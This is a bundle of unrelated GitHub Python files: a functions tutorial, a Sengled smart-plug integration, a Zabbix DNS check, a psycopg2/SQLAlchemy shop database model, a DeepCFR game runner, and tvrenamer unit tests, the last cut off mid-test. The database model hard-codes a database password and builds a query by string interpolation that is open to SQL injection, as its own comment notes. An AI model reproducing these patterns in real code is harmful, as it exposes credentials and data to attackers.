# Chapter 8: Functions
###########################################
###########################################
# print a greeting
# the str() is needed if someones's name is a number
def greeting(name):
    """ simple greeting """
    # Three equivalent ways to print the greeting. Only the first is safe
    # when `name` is not a string: the other two call name.title() directly,
    # which raises AttributeError for e.g. an int.
    print ("Hi, "+ str(name).title())
    print ("Hi, "+ str(name.title()))
    print ("Hi, "+ name.title())
greeting ("andi")
###########################################
# keyword arguments, default values
# Demonstrates a keyword argument with a default value ("dog").
def pets (pet_name, pet_type = "dog"):
    """ returns pet name and type """
    # NOTE: prints rather than returns, despite the docstring wording.
    print (pet_name.title() + " is my " + pet_type + ".")
# Positional, positional-override, and keyword-argument call styles:
pets ("Barko")
pets ("Hops", "hamster")
pets (pet_type = "hamster", pet_name = "Hops" )
###########################################
# return value
def calculate(a):
    """Return the tuple (a, a squared)."""
    square = a * a
    return a, square
print (calculate(5))
| aschiedermeier/Python_Crash_course | 8_1_Functions.py | 8_1_Functions.py | py | 935 | python | en | code | 0 | github-code | 50 |
8339732859 | """Sengled Bulb Integration."""
import asyncio
import logging
_LOGGER = logging.getLogger(__name__)
class Switch:
    """Sengled cloud-connected switch/plug.

    Issues on/off commands through the Sengled element-cloud HTTP API
    (fire-and-forget via the shared ``api`` helper) and refreshes state
    from the device-details endpoint in ``async_update``.
    """
    def __init__(
        self,
        api,
        device_mac,
        friendly_name,
        state,
        device_model,
        accesstoken,
        country,
    ):
        _LOGGER.debug("SengledApi: Switch " + friendly_name + " initializing.")
        self._api = api
        self._device_mac = device_mac
        self._friendly_name = friendly_name
        self._state = state
        # NOTE: keeps the original 'avaliable' spelling so existing callers
        # still find the attribute.
        self._avaliable = True
        # Set right after we send a command so the next poll does not
        # overwrite our optimistic local state with stale cloud data.
        self._just_changed_state = False
        self._device_model = device_model
        self._accesstoken = accesstoken
        self._country = country
    async def async_turn_on(self):
        """Request 'on' (onoff=1). Optimistic: does not await the HTTP call."""
        _LOGGER.debug("Switch " + self._friendly_name + " turning on.")
        url = (
            "https://"
            + self._country
            + "-elements.cloud.sengled.com/zigbee/device/deviceSetOnOff.json"
        )
        payload = {"deviceUuid": self._device_mac, "onoff": "1"}
        loop = asyncio.get_running_loop()
        # Fire-and-forget: the request runs as a background task.
        loop.create_task(self._api.async_do_request(url, payload, self._accesstoken))
        self._state = True
        self._just_changed_state = True
    async def async_turn_off(self):
        """Request 'off' (onoff=0). Optimistic: does not await the HTTP call."""
        _LOGGER.debug("Switch " + self._friendly_name + " turning off.")
        url = (
            "https://"
            + self._country
            + "-elements.cloud.sengled.com/zigbee/device/deviceSetOnOff.json"
        )
        payload = {"deviceUuid": self._device_mac, "onoff": "0"}
        loop = asyncio.get_running_loop()
        loop.create_task(self._api.async_do_request(url, payload, self._accesstoken))
        self._state = False
        self._just_changed_state = True
    def is_on(self):
        """Last known (possibly optimistic) on/off state."""
        return self._state
    async def async_update(self):
        """Refresh name/state/availability from the cloud device list.

        NOTE(review): unlike the on/off URLs, this endpoint does not embed
        ``self._country`` — confirm whether that is intentional.
        """
        _LOGGER.debug("Switch " + self._friendly_name + " updating.")
        if self._just_changed_state:
            self._just_changed_state = False
        else:
            url = (
                "https://element.cloud.sengled.com/zigbee/device/getDeviceDetails.json"
            )
            payload = {}
            data = await self._api.async_do_request(url, payload, self._accesstoken)
            _LOGGER.debug("Switch " + self._friendly_name + " updating.")
            # NOTE(review): the response lists every device and nothing here
            # filters by self._device_mac, so the LAST lamp's attributes win
            # — verify this is the intended behavior.
            for item in data["deviceInfos"]:
                for items in item["lampInfos"]:
                    self._friendly_name = items["attributes"]["name"]
                    self._state = (
                        True if int(items["attributes"]["onoff"]) == 1 else False
                    )
                    self._avaliable = (
                        False if int(items["attributes"]["isOnline"]) == 0 else True
                    )
| jfarmer08/ha-sengledapi | custom_components/sengledapi/sengledapi/devices/switch.py | switch.py | py | 2,753 | python | en | code | 97 | github-code | 50 |
30755941328 | from category import Category
from customer import Customer
from email import Email
from phone import Phone
from goods import Goods
from base import Base
from order import Order
from base import Base, Session, engine
import psycopg2
import query_parser
def iterator(mes):
    """Append ten SQL fragments — each yielding one random uppercase
    letter, joined with '||' — to *mes* and return the result."""
    fragment = "chr(trunc(65+random()*25)::int) || "
    return mes + fragment * 10
class Model:
    """Data-access layer for the shop database.

    CRUD operations go through the SQLAlchemy session; the generate_*
    methods build raw PostgreSQL statements (random data via generate_series)
    and run them on a separate psycopg2 connection.
    """
    # ========== ctor ==========
    def __init__(self):
        # Create any missing tables, then open both access paths.
        # NOTE(review): database credentials are hard-coded here — consider
        # moving them to configuration.
        Base.metadata.create_all(engine)
        self.session = Session()
        self.conn = psycopg2.connect("dbname='shop' user='postgres' host='localhost' password='3497279088'")
        self.curs = self.conn.cursor()
    # ========== Goods table ==========
    def read_goods_by_pk(self, goods_pk):
        return self.session.query(Goods).filter(Goods.goods_id == goods_pk).one()
    def insert_goods(self, goods):
        # goods: (id, name, price, discount, guarantee) — category resolved by id.
        self.session.add(Goods(goods[0], goods[1], goods[2], goods[3], goods[4], self.session.query(Category)
                               .filter(Category.category_id == goods[4]).one()))
        self.session.commit()
    def update_goods(self, goods):
        self.session.query(Goods).filter(Goods.goods_id == goods[0]) \
            .update({'name': goods[1], 'price': goods[2], 'discount': goods[3], 'guarantee': goods[4],
                     'category_id': goods[5]})
        self.session.commit()
    def delete_goods(self, goods_start_id, goods_end_id):
        # Deletes the inclusive id range [start, end].
        self.session.query(Goods).filter(Goods.goods_id >= goods_start_id).filter(Goods.goods_id <= goods_end_id)\
            .delete()
        self.session.commit()
    def generate_goods(self, goods_counter):
        # Random name (20 letters), price, discount, fixed guarantee, random category.
        message = "SELECT "
        for i in range(2):
            message = iterator(message)
        message += 'chr(trunc(65+random()*25)::int), trunc(10000+random()*999999)::int, random()*30, 24, ' \
                   '(SELECT category_id FROM "Category" order by random() limit 1) from generate_series(1, {})' \
            .format(goods_counter)
        self.curs.execute('INSERT INTO "Goods" (name, price, discount, guarantee, category_id) {}'.format(message))
        self.conn.commit()
    # ========== Customers table ==========
    def read_customer_by_pk(self, customer_pk):
        return self.session.query(Customer).filter(Customer.customer_id == customer_pk).one()
    def insert_customer(self, customer):
        self.session.add(Customer(customer[0], customer[1], customer[2], customer[3]))
        self.session.commit()
    def update_customer(self, customer):
        self.session.query(Customer).filter(Customer.customer_id == customer[0]) \
            .update({'surname': customer[1], 'name': customer[2], 'father_name': customer[3], 'favourites': customer[4]})
        self.session.commit()
    def delete_customer(self, customer_start_id, customer_end_id):
        self.session.query(Customer).filter(Customer.customer_id >= customer_start_id) \
            .filter(Customer.customer_id <= customer_end_id).delete()
        self.session.commit()
    def generate_customers(self, customers_number):
        # Random 11-letter surname/name/father_name; favourites come from the
        # server-side random_favourites() function.
        message = "SELECT "
        message = iterator(message)
        message += "chr(trunc(65+random()*25)::int) as surname, "
        message = iterator(message)
        message += "chr(trunc(65+random()*25)::int) as name, "
        message = iterator(message)
        message += "chr(trunc(65+random()*25)::int) as father_name "
        self.curs.execute('INSERT INTO "Customer" (surname, name, father_name, favourites) {},'
                          'random_favourites() from generate_series(1, {})'
                          .format(message, customers_number))
        self.conn.commit()
    # ========== Phone table ==========
    def read_phone_by_pk(self, phone_pk):
        return self.session.query(Phone).filter(Phone.phone == phone_pk).one()
    def insert_phone(self, phone):
        self.session.add(Phone(phone[0], phone[1], self.session.query(Customer)
                               .filter(Customer.customer_id == phone[1]).one()))
        self.session.commit()
    def update_phone(self, phone):
        self.session.query(Phone).filter(Phone.phone == phone[0]) \
            .update({'phone': phone[1], 'customer_id': phone[2]})
        self.session.commit()
    def delete_phone(self, phone):
        # Case-insensitive match (ilike) on the phone string.
        self.session.query(Phone).filter(Phone.phone.ilike(phone)).delete()
        self.session.commit()
    def generate_phone(self, phone_counter):
        # '+' followed by a random 9-digit-range number, random owner.
        self.curs.execute('INSERT INTO "Phone" SELECT ' + "'+'" + ' || text(trunc(100000000+random()*999999999)::int), '
                          '(SELECT customer_id FROM "Customer" order by random() limit 1) FROM generate_series(1, {})'.
                          format(phone_counter))
        self.conn.commit()
    # ========== Email table ==========
    def read_email_by_pk(self, email_pk):
        return self.session.query(Email).filter(Email.email == email_pk).one()
    def insert_email(self, email):
        self.session.add(Email(email[0], email[1], self.session.query(Customer)
                               .filter(Customer.customer_id == email[1]).one()))
        self.session.commit()
    def update_email(self, email):
        self.session.query(Email).filter(Email.email == email[0]) \
            .update({'email': email[1], 'customer_id': email[2]})
        self.session.commit()
    def delete_email(self, email):
        self.session.query(Email).filter(Email.email == email).delete()
        self.session.commit()
    def generate_emails(self, emails_counter):
        # Random 20-letter local part + '@gmail.com', random owner.
        message = "SELECT "
        for i in range(2):
            message = iterator(message)
        message += "'@gmail.com'"
        self.curs.execute('INSERT INTO "Email" {}, (SELECT customer_id FROM "Customer" '
                          'order by random() limit 1) FROM generate_series(1, {})'.
                          format(message, emails_counter))
        self.conn.commit()
    # ========== Category table ==========
    def read_category_by_pk(self, category_pk):
        return self.session.query(Category).filter(Category.category_id == category_pk).one()
    def insert_category(self, category):
        # category[1] is the optional parent; omit it when blank.
        if category[1] != '':
            self.session.add(Category(category[0], category[1]))
        else:
            self.session.add(Category(category[0]))
        self.session.commit()
    def update_category(self, category):
        self.session.query(Category).filter(Category.category_id == category[0]) \
            .update({'name': category[1], 'parent_category_id': category[2]})
        self.session.commit()
    def delete_category(self, category_start_id, category_end_id):
        self.session.query(Category).filter(Category.category_id >= category_start_id) \
            .filter(Category.category_id <= category_end_id).delete()
        self.session.commit()
    def generate_categories(self, categories_counter):
        # Random 21-letter name, no parent.
        message = "SELECT "
        for i in range(2):
            message = iterator(message)
        message += "chr(trunc(65+random()*25)::int), null"
        self.curs.execute('INSERT INTO "Category" (name, parent_category_id) {} FROM generate_series(1, {})'
                          .format(message, categories_counter))
        self.conn.commit()
    # ========== Order table ==========
    def read_order_by_pk(self, order_pk):
        return self.session.query(Order).filter(Order.order_id == order_pk).one()
    def insert_order(self, order):
        self.session.add(Order(order[0], order[1], order[2], order[3], self.session.query(Goods)
                               .filter(Goods.goods_id == order[1]).one(), self.session.query(Customer)
                               .filter(Customer.customer_id == order[2]).one()))
        self.session.commit()
    def update_order(self, order):
        self.session.query(Order).filter(Order.order_id == order[0]) \
            .update({'date': order[1], 'goods_id': order[2], 'customer_id': order[3], 'confirming_method': order[4]})
        self.session.commit()
    def delete_order(self, order_start_id, order_end_id):
        self.session.query(Order).filter(Order.order_id >= order_start_id).filter(Order.order_id <= order_end_id)\
            .delete()
        self.session.commit()
    def generate_orders(self, orders_number):
        # Random timestamp in [2008-01-10, 2020-12-31], random goods/customer,
        # fixed 'phone' confirmation method.
        message = "SELECT timestamp '2008-01-10 20:00:00' + " \
                  "random() * (timestamp '2020-12-31 23:00:00' - timestamp '2008-01-10 20:00:00'), " \
                  '(SELECT goods_id FROM "Goods" order by random() limit 1), ' \
                  '(SELECT customer_id FROM "Customer" order by random() limit 1), ' + "'phone'"
        self.curs.execute('INSERT INTO "Order" '
                          '(date, goods_id, customer_id, confirming_method) {} from generate_series(1, {})'
                          .format(message, orders_number))
        self.conn.commit()
    # ========== Find ==========
    def find_entities(self, query):
        # NOTE(review): this stray `pass` is a no-op left over from a stub.
        # Also note the table name and parsed conditions are interpolated
        # straight into the SQL string (injection risk if `query` comes from
        # user input), and rstrip("and ") strips *characters*, not the word.
        pass
        try:
            message = "SELECT * FROM \"{}\" WHERE ".format(query[0])
            message += query_parser.QueryParser.parse_query(query)
            message = message.rstrip("and ")
            self.curs.execute(message)
            return self.curs.fetchall()
        except Exception as ex:
            raise ex
        finally:
            # Roll back in every case so a failed SELECT does not leave the
            # psycopg2 connection in an aborted-transaction state.
            self.conn.rollback()
| filenkoB/databases | lab3/model.py | model.py | py | 9,396 | python | en | code | 0 | github-code | 50 |
2354781570 | from Compilador.Entorno import entorno
from Compilador.Entorno.simbolo import Simbolo
from Compilador.Expresiones.llamada_funcion_exp import Llamada_funcion_exp
from Compilador.Interfaces.nodo import Nodo
from Compilador import generador
from Compilador.TablaSimbolo.tipo import tipo
class Declaracion(Nodo):
    """AST node for a variable declaration.

    crearTabla registers one symbol per declared identifier in the symbol
    table; crearCodigo3d emits 3-address C code that evaluates the
    initializer and stores it into each variable's stack slot.
    """
    def __init__(self,token, idnodo, tipo, valor, listaid, esMutable, fila, columna):
        super().__init__(token,idnodo)
        self.listaid = listaid          # identifiers being declared
        self.valor = valor              # initializer expression node
        self.tipo = tipo                # declared type, or None to infer from valor
        self.esMutable = esMutable      # mutability flag
        self.fila = fila                # source row (error reporting)
        self.columna = columna          # source column (error reporting)
        self.tipoSimbolo = "variable"
        #print("Tipo (declaracion): ",self.tipo.tipo_string)
    def crearTabla(self,ts):
        """Add a symbol for each declared id to table `ts` (and the global list)."""
        for id in self.listaid:
            self.valor.crearTabla(ts)
            # Type inference: take the initializer's type when none was declared.
            if self.tipo is None:
                print("--",self.valor.tipo)
                self.tipo = self.valor.tipo
            print(id)
            print(self.tipo.tipo_enum)
            # Only scalar types get a symbol here.
            if self.tipo.tipo_enum == tipo.I64 or self.tipo.tipo_enum == tipo.F64 or self.tipo.tipo_enum == tipo.STR \
                    or self.tipo.tipo_enum == tipo.STRING or self.tipo.tipo_enum == tipo.CHAR or self.tipo.tipo_enum == tipo.BOOL:
                nuevoSimbolo = Simbolo(id, self.tipo,self.tipoSimbolo,1, ts.nombre, ts.getUltimaPosStack(),self.valor.posHeap,self.fila,self.columna)
                ts.put(id, nuevoSimbolo)
                entorno.tabla_simbolos_global.append(nuevoSimbolo)
                entorno.desplazamiento += 1 # <-- TODO: verify whether this counter is still used
    def crearCodigo3d(self,ts):
        """Emit 3-address code: evaluate the initializer once into a temp,
        then store the temp into each declared variable's stack slot."""
        self.expresion += "//Realizando declaracion"+"\n"
        tempValor = generador.nuevoTemporal()
        self.expresion += self.valor.crearCodigo3d(ts)
        for id in self.listaid:
            if self.tipo.tipo_enum == tipo.I64 or self.tipo.tipo_enum == tipo.F64 or self.tipo.tipo_enum == tipo.STR\
                    or self.tipo.tipo_enum == tipo.STRING or self.tipo.tipo_enum == tipo.CHAR:
                self.expresion += tempValor + " = " + str(self.valor.ref)+";\n"
            elif self.tipo.tipo_enum == tipo.BOOL:
                #print("-",self.valor.exp1)
                print(self.valor.ref)
                etiSalida = [generador.nuevaEtiqueta()]
                if isinstance(self.valor,Llamada_funcion_exp):
                    # Function calls already materialize the bool in a temp.
                    self.expresion += tempValor + " = " + self.valor.ref + ";\n"
                else:
                    # Short-circuit form: the expression's true/false labels
                    # collapse into 1/0 stored in the temp.
                    self.expresion += generador.soltarEtiqueta(self.valor.etiV)
                    self.expresion += tempValor + " = 1;\n"
                    self.expresion += generador.generarGoto(etiSalida[0])
                    self.expresion += generador.soltarEtiqueta(self.valor.etiF)
                    self.expresion += tempValor + " = 0;\n"
                    self.expresion += generador.soltarEtiqueta(etiSalida)
            # Generate the temp holding the stack address where the variable lives.
            tempPosVariable = generador.nuevoTemporal()
            #print(id)
            self.expresion += tempPosVariable + " = P + "+str(ts.get(id).direccionRel)+";\n"
            self.expresion += "stack[(int)"+tempPosVariable+"] = " + tempValor+";\n"
        return self.expresion
def calcTam(self):
if self.tipo.tipo_enum != tipo.VEC or self.tipo.tipo_enum != tipo.ERROR:
return 1
return 0 | JASAdrian1/OLC2_Proyecto2_201901704 | Compilador/Instrucciones/declaracion.py | declaracion.py | py | 3,415 | python | es | code | 0 | github-code | 50 |
21670622468 | """Some things never change."""
import typer
from ee_cli.settings import Settings
settings = Settings()
EXIT_HOTWORDS = {"end", "exit", "done", "quit", "q"}
RESET_HOTWORDS = {"clear", "restart", "c"}
DROP_HOTWORDS = {"drop", "remove", "rm", "d"}
TOGGLE_INDEX_HOTWORDS = {"index", "idx", "indexes", "i"}
HELP_HOTWORDS = {"help", "h", "?"}
SHOW_CONFIG_HOTWORDS = {"config", "settings", "env"}
GO_BACK_HOTWORDS = {"back"}
COPY_HOTWORDS = {"copy", "yy", "cp"}
PENDULUM_SEMANTIC_ATTRS = {"tomorrow", "today", "yesterday"}
COULD_NOT_PARSE_ERROR_MESSAGE = "Couldn't parse: {date}. Try again?."
NO_TIMES_YET_MESSAGE = "Transformations added to the list as you type them"
HELP_HEADER = typer.style(
"\n Type the word 'back' to leave this screen\n\n", typer.colors.BRIGHT_MAGENTA
)
HOTWORDS_HELP = f"""
To exit the repl use: {typer.style(str(EXIT_HOTWORDS), typer.colors.RED)}.
[ctrl + d] and [ctrl + c] also work.
To remove the last item from the list use: {typer.style(str(DROP_HOTWORDS), typer.colors.RED)}.
To remove arbitrary items, include the 0-based index of the item.
i.e. `drop 3` will drop the 4th item shown on screen.
To send all your conversions to the clipboard, use {typer.style(str(COPY_HOTWORDS), typer.colors.RED)}.
This will exit the repl.
To clear the list use: {typer.style(str(RESET_HOTWORDS), typer.colors.RED)}.
To inspect your configuration (env vars) use: {typer.style(str(SHOW_CONFIG_HOTWORDS), typer.colors.RED)}.
To see this help in the repl use: {typer.style(str(HELP_HOTWORDS), typer.colors.RED)}.
""" # the space is intentional
CONFIGURATION_INFO = (
"\n".join(
f"{settings.Config.env_prefix}{k.upper()}: {v}"
for k, v in settings.dict(by_alias=True).items()
)
+ "\n "
)
MAYBE_TZ_HEADS_UP = typer.style(
f"(tz={settings.default_timezone})" if settings.show_tz_heads_up else "",
typer.colors.BRIGHT_YELLOW,
)
DEFAULT_DATETIME_INPUT_FORMATS = (
"MM-DD-YY",
"MMM DD YYYY",
"MMM D YYYY",
"MMM D YY",
"MMM DD YY",
)
| ainsleymcgrath/epoch-echo | ee_cli/constants.py | constants.py | py | 2,012 | python | en | code | 2 | github-code | 50 |
74343895835 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#author: Jiang Liu<jiang.liu@yottaa.com>
#date: 2014-3-27
try:
import json
except ImportError:
import simplejson as json
import os,commands
from zabbix_socket_sender import Zabbix
# Module-level payload dict mutated by dns_health() and sent to Zabbix.
data = {}
def dns_health():
    """Probe the local DNS server and record the result in `data`.

    Runs `dig` against 127.0.0.1 for a known record; status[0] is the shell
    exit code (0 = resolution succeeded), stored under 'dns_health'.
    NOTE: uses the Python 2-only `commands` module.
    """
    status = commands.getstatusoutput('dig +time=3 +tries=3 +noall +answer @127.0.0.1 system.topology.tpu.yottaa.net >/dev/null 2>&1')
    data['dns_health'] = int(status[0])
    return data
def push_data():
    """Collect the DNS health metric and push it to Zabbix, keyed by this
    host's public IP (read from /etc/company.facts via a shell pipeline)."""
    host = os.popen("cat /etc/company.facts |grep publicip |awk '{print $3}'").read().strip()
    TMUdata = dns_health()
    hostvalues = {host:TMUdata}
    Zabbix(hostvalues).run()
if __name__ == "__main__":
push_data() | canshen-yottaa/shencan | ansible/zabbix/roles/install/files/zabbix_tmu.py | zabbix_tmu.py | py | 703 | python | en | code | 0 | github-code | 50 |
11272726020 | import torch
import random
from agents.RandomAgent import RandomAgent
from agents.DeepCFR.DeepCFRAgent import DeepCFRAgent
from agents.DeepCFR.StrategyMemory import StrategyMemory
from copy import deepcopy
from statistics import mean
"""
Two randomization techniques we are using for avoiding local minima are:
1) Restart the DeepCFR Advantage Networks from scratch after some iterations
2) Pertubation in strategies which favours a single action. This could improve some exploration.
"""
"""
Things to notice:
1) DeepCFR is quite sensitive to initializations!
"""
class CFRRunner(object):
    def __init__(
        self,
        payoff_matrix,
        num_iterations,
        K=100,
        num_runs=1000,
        advantage_batch_size=32,
        policy_batch_size=32,
        advantage_memory_size=20000,
        strategy_memory_size=20000,
    ):
        """Set up a two-player Deep CFR runner.

        payoff_matrix: payoff lookup indexed by each player's encoded
        (card, action) choice; num_iterations: CFR iterations per DeepCFR
        call; K: tree traversals per player per iteration; num_runs:
        outer training runs; the *_batch_size / *_memory_size arguments
        size the advantage/strategy reservoir memories and training batches.
        """
        self.payoff_matrix = payoff_matrix
        self.player_list = [0, 1]
        self.advantage_memory_size = advantage_memory_size
        self.strategy_memory_size = strategy_memory_size
        # One Deep CFR agent per player, each with its own advantage memory.
        self.agents = [
            DeepCFRAgent(0, advantage_memory_size),
            DeepCFRAgent(1, advantage_memory_size),
        ]
        self.num_iterations = num_iterations
        self.K = K
        # Shared strategy memory across both players.
        self.strategy_memory = StrategyMemory(
            self.player_list, self.strategy_memory_size
        )
        self.advantage_batch_size = advantage_batch_size
        self.policy_batch_size = policy_batch_size
        self.num_runs = num_runs
    def run(self):
        """Outer training loop: run DeepCFR num_runs times, printing the
        score from evaluate() after each run. Every 100 runs the advantage
        networks are reset from scratch (see the module note on avoiding
        local minima)."""
        for i in range(self.num_runs):
            if i % 100 == 0:
                self.set_advantage_weights_zero()
            # Offset the iteration counter so linear CFR weighting keeps
            # growing across runs.
            self.DeepCFR(i * self.num_iterations)
            print()
            print("Game Strength: {}".format(self.evaluate()))
            print()
    def DeepCFR(self, start_iter):
        """
        Initialize each player's advantage network, such that it returns 0 for all outputs.
        Initialize reservoir sampled memories for advantages and a strategy memory.
        """
        # Phase 1: CFR traversals — fill advantage/strategy memories and
        # train each player's advantage network once per iteration.
        for iteration in range(self.num_iterations):
            """
            For training from scratch in each iteration
            """
            for agent in self.agents:
                agent.deal_card()
            for player in self.player_list:
                # K external-sampling traversals for this player; the
                # iteration weight is offset by start_iter (linear CFR).
                for traversal in range(self.K):
                    self.TRAVERSE(
                        [], self.strategy_memory, (iteration + 1 + start_iter), player
                    )
                self.agents[player].sample_advantage_and_train(
                    self.advantage_batch_size
                )
        """
        Train for policy network of each agent to converge to the strategy.
        """
        # Phase 2: distill the accumulated strategies into each policy net.
        for policy_iteration in range(100):
            for player in self.player_list:
                data = self.strategy_memory.sample(player, self.policy_batch_size)
                self.agents[player].train_policy_net(data, self.policy_batch_size)
            if policy_iteration % 10 == 0:
                print(
                    "Partial Game Strength in iteration {}: {}".format(
                        policy_iteration, self.evaluate()
                    )
                )
def TRAVERSE(self, history, strategy_memory, t, p):
"""
if h is terminal then return the payoff to player p
"""
if len(history) == 2:
player1 = history[0]["action"] + torch.Tensor([3 * self.agents[0].card])
player2 = history[1]["action"] + torch.Tensor([3 * self.agents[1].card])
return_val = self.payoff_matrix[int(player1)][int(player2)]
return return_val
"""
if h is a chance node, then sample an action from the probabilities. But in our two player matrix game, there is no chance node, so we do not need to cansider them!
"""
"""
if P(h) = p, then compute strategy from predicted advantages using regret matching
"""
if len(history) == p:
"""
Compute strategy, from advantage network
"""
I = self.agents[p].get_infoset(history)
advantage_values = self.agents[p].compute_advantage(I)
advantage_values = torch.clamp(advantage_values, min=0)
strategy = (
advantage_values / advantage_values.sum()
if advantage_values.sum() > 0.000001
else torch.full_like(advantage_values, 1 / advantage_values.shape[0])
)
v = torch.zeros(3)
expected_v = 0
for action in [0, 1, 2]:
pseudo_history = deepcopy(history)
pseudo_history.append({"action": action})
v[action] = self.TRAVERSE(pseudo_history, strategy_memory, t, p)
with torch.no_grad():
expected_v += strategy[action] * v[action]
"""
Compute Advantages
"""
regrets = torch.zeros(3)
for action in [0, 1, 2]:
regrets[action] = v[action] - expected_v
"""
Insert the infoset and action advantages into the advantage memory
"""
buffer_object = {"infoset": I, "t": t, "regrets": regrets}
self.agents[p].advantage_memory.add_memory_object(buffer_object)
else:
I = self.agents[1 - p].get_infoset(history)
advantage_values = self.agents[1 - p].compute_advantage(I)
advantage_values = torch.clamp(advantage_values, min=0)
strategy = (
advantage_values / advantage_values.sum()
if advantage_values.sum() > 0.000001
else torch.full_like(advantage_values, 1 / advantage_values.shape[0])
)
"""
Insert infoset and action probabilities into strategy memory.
"""
strategy_memory_object = {"infoset": I, "t": t, "strategy": strategy}
self.strategy_memory.insert_element(1 - p, strategy_memory_object)
"""
Sample an action a from probability distribution of the strategy
"""
action = random.choices([0, 1, 2], weights=strategy, k=1)[0]
history.append({"action": action})
return self.TRAVERSE(history, strategy_memory, t, p)
def evaluate(self):
rewards = []
for _ in range(1000):
history = []
for agent in self.agents:
agent.deal_card()
move = agent.act_policy(history)
history.append(
{
"action": move,
}
)
player1 = history[0]["action"] + 3 * self.agents[0].card
player2 = history[1]["action"] + 3 * self.agents[1].card
episode_reward = self.payoff_matrix[int(player1)][int(player2)]
rewards.append(episode_reward)
return mean(rewards)
def add_strategy_pertubation1(self, strategy):
index = (strategy == 1).nonzero()
if index.shape[0] == 0:
return strategy
assert index.shape == (1, 1)
index = index.item()
torch.fill_(strategy, 0.15 / strategy.shape[0])
strategy[index] += 0.85
return strategy
def add_strategy_pertubation2(self, strategy):
strategy += 0.2
return strategy / strategy.sum()
def set_advantage_weights_zero(self):
for agent in self.agents:
agent.advantage_net.init_weights()
| prateekstark/matrix-game | CFRRunner.py | CFRRunner.py | py | 7,595 | python | en | code | 0 | github-code | 50 |
15830134815 | import mock
import six
from tvrenamer.core import formatter
from tvrenamer.tests import base
class FormatterTest(base.BaseTest):
    """Unit tests for tvrenamer.core.formatter.

    Exercises series-name cleaning/replacement, episode number/name
    formatting, filename sanitization per platform, and library lookup.
    """
    def test_replace_series_name(self):
        """_replace_series_name applies the configured input mapping
        (keys are matched; non-matching names pass through unchanged)."""
        self.CONF.set_override('input_series_replacements', dict())
        name = 'Reign'
        self.assertEqual(
            formatter._replace_series_name(
                name, self.CONF.input_series_replacements),
            'Reign')
        # Mapping keyed on a name that does not match -> unchanged.
        self.CONF.set_override('input_series_replacements',
                               {'reign (2013)': 'reign'})
        name = 'Reign'
        self.assertEqual(
            formatter._replace_series_name(
                name, self.CONF.input_series_replacements),
            'Reign')
        # Matching key -> replacement value is returned.
        self.CONF.set_override('input_series_replacements',
                               {'reign': 'reign (2013)'})
        name = 'Reign'
        self.assertEqual(
            formatter._replace_series_name(
                name, self.CONF.input_series_replacements),
            'reign (2013)')
    def test_clean_series_name(self):
        """clean_series_name turns separators into spaces but keeps
        version-like dots (e.g. '1.0') intact."""
        self.CONF.set_override('input_series_replacements', dict())
        self.assertIsNone(formatter.clean_series_name(None))
        self.assertEqual(formatter.clean_series_name(''), '')
        name = 'an.example.1.0.test'
        self.assertEqual(formatter.clean_series_name(name),
                         'an example 1.0 test')
        name = 'an_example_1.0_test'
        self.assertEqual(formatter.clean_series_name(name),
                         'an example 1.0 test')
    def test_apply_replacements(self):
        """apply_replacements honors literal and regex rules, with or
        without the file extension in scope."""
        self.assertEqual('sample.avi',
                         formatter.apply_replacements('sample.avi', None))
        self.assertEqual('sample.avi',
                         formatter.apply_replacements('sample.avi', []))
        reps = [{'match': '_test',
                 'replacement': '',
                 'with_extension': False,
                 'is_regex': False},
                ]
        self.assertEqual('sample.avi',
                         formatter.apply_replacements('sample_test.avi', reps))
        reps = [{'match': '_test',
                 'replacement': '',
                 'with_extension': True,
                 'is_regex': False},
                ]
        self.assertEqual('sample.avi',
                         formatter.apply_replacements('sample_test.avi', reps))
        # Regex rule: character class applied to the basename.
        reps = [{'match': '[ua]+',
                 'replacement': 'x',
                 'with_extension': False,
                 'is_regex': True},
                ]
        self.assertEqual('sxmple_test.avi',
                         formatter.apply_replacements('sample_test.avi', reps))
    def test_format_episode_numbers(self):
        """Episode numbers are zero-padded and dash-joined."""
        epnums = [1]
        self.assertEqual(formatter._format_episode_numbers(epnums),
                         '01')
        epnums = [1, 2, 3, 4, 5]
        self.assertEqual(formatter._format_episode_numbers(epnums),
                         '01-02-03-04-05')
    def test_format_episode_name(self):
        """Multi-part episode names collapse '(1)/(2)' suffixes into a
        range; unrelated names are comma-joined."""
        names = ['Pilot']
        self.assertEqual(formatter._format_episode_name(names),
                         'Pilot')
        names = ['Pilot (1)', 'Pilot (2)']
        self.assertEqual(formatter._format_episode_name(names),
                         'Pilot (1-2)')
        names = ['From Hell', 'And Back']
        self.assertEqual(formatter._format_episode_name(names),
                         'From Hell, And Back')
    def test_make_valid_filename(self):
        """_make_valid_filename sanitizes per-platform forbidden
        characters, leading dots, reserved names, and over-long names."""
        # normal - asis
        name = 'person.of.interest.s04e10.proper.hdtv.x264-w4f.mp4'
        self.assertEqual(formatter._make_valid_filename(name),
                         'person.of.interest.s04e10.proper.hdtv.x264-w4f.mp4')
        # Leading dot (hidden file) gets an underscore prefix.
        name = '.sample.filename'
        self.assertEqual(formatter._make_valid_filename(name),
                         '_.sample.filename')
        # Non-ASCII characters are stripped.
        name = six.u('foo\xf1bar')
        self.assertEqual(formatter._make_valid_filename(name),
                         'foobar')
        with mock.patch.object(formatter.platform, 'system',
                               return_value='FreeBSD'):
            # / (all OS)
            name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest.s04_e10.x264_-w4f.mp4')
        with mock.patch.object(formatter.platform, 'system',
                               return_value='Linux'):
            # / (all OS)
            name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest.s04_e10.x264_-w4f.mp4')
        with mock.patch.object(formatter.platform, 'system',
                               return_value='Darwin'):
            # / (all OS)
            name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest.s04_e10.x264_-w4f.mp4')
            # :
            name = 'person.of.interest:.s04e10:.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest_.s04e10_.x264-w4f.mp4')
        with mock.patch.object(formatter.platform, 'system',
                               return_value='Java'):
            # 'Java' (Jython) is treated like Windows: the full forbidden set.
            # / (all OS)
            name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
                             'person.of.interest.s04_e10.x264_-w4f.mp4')
            # :
            name = 'person.of.interest:.s04e10:.x264-w4f.mp4'
            self.assertEqual(formatter._make_valid_filename(name),
